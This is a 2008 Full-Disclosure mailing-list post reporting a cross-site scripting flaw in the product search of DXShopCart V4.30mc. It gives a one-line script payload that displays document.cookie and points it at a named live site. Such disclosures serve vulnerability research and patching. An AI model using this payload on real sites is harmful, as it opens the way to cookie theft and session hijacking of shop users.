Message-ID: <819cb9500808211252h14c99f1fv2b2c353bf8143d5a@mail.gmail.com>
Date: Thu, 21 Aug 2008 15:52:43 -0400
From: "bug squash" <bugsquashr@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: DXShopCart V4.30mc search.php XSS

###################################
DXShopCart V4.30mc search.php XSS
###################################

Author: d00m3d! Chik3n hUnT3r 666
email: bugsquashr@...il.com

Example:

<script>alert(document.cookie)</script> in the product search on
http://www.scripts4profit.net/ShopCartDX/index.php
click submit - doh!

###################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/